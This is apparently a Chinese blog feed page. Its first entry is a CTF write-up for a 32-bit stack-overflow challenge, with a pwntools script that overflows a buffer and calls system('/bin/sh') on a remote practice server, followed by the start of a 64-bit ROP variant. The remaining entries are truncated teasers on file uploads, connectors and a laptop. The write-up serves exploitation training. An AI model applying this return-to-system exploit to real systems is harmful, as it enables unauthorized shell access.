张小明
前端开发工程师
使用checksec打开文件查看保护
使用ida打开文件,发现主函数没有什么特别的,直接跟进vulnerable_function函数
发现存在read函数,并且buf缓冲区可以被溢出,由于保护只开启了栈不可执行,因此我们查找一下后门函数
通过plt表来跳转到system函数
system执行完后需要有个返回地址,于是我们随便给个合法地址,在之后写入bin_sh的地址
来让其执行system("/bin/sh")
from pwn import * #p=process('./level2') p=remote('node5.buuoj.cn',25681) system_addr = 0x08048320 fake_ret = 0x08048480 bin_sh = 0x0804A024 pay=b'a'*140+ p32(system_addr) + p32(fake_ret) + p32(bin_sh) p.sendline(pay) p.interactive()步骤使用checksec查看使用ida(pro)打开根进vulnerable_function函数依旧是栈溢出这道题我们无法使用上一题的32位来直接使用plt表来跳转到system,所以我们使用ROPgadget使用指令 ROPgadget --binary 文件名 来获取信息这里可以查看到pop rdi;ret的地址在64位中前几个参数我们是…
李华
网工大三党文件上传救星:原生JS实现10G大文件上传(Vue3IE8兼容) 兄弟,作为刚入坑网络工程的山西老狗,我太懂你现在的处境了——老师要10G大文件上传的毕业设计,网上找的代码全是“断头路”,后端…
李华
毕业设计:企业级文件传输系统方案探索 在毕业设计选题阶段,我结合自身兴趣与计算机专业所学,确定了企业级文件传输系统这一课题。近期,我在网上搜索相关资料、参与论坛交流、加入多个QQ群和微信群,但收获不尽如人意。很…
李华
我,一个被大文件上传逼疯的大三狗,想和你唠唠毕业设计的血泪史 最近为了做毕业设计,我把头发薅掉了小半——老师要的是“能打”的文件管理系统,核心需求就一条:10G大文件上传,还要支持文件夹、断点续传、加…
李华
连接器广泛应用于各种用电的场合,而连接器往往位于系统,子系统或部件/组件的界面位置,故防水有时成为连接器必不可少的要求。要实现可靠地防水,设计时需系统地考虑相关因素:防护的等级要求密封材料的选择合适的尺寸结构-导向&…
李华
对于专业创作者而言,灵感往往不期而至。它可能出现在通勤的地铁上,喧闹的咖啡馆里,或是拍摄现场。然而,传统的移动办公设备往往难以承载8K剪辑、3D渲染或大模型部署等重度任务。华硕ProArt 创16的出现,打破这一桎梏。它…
李华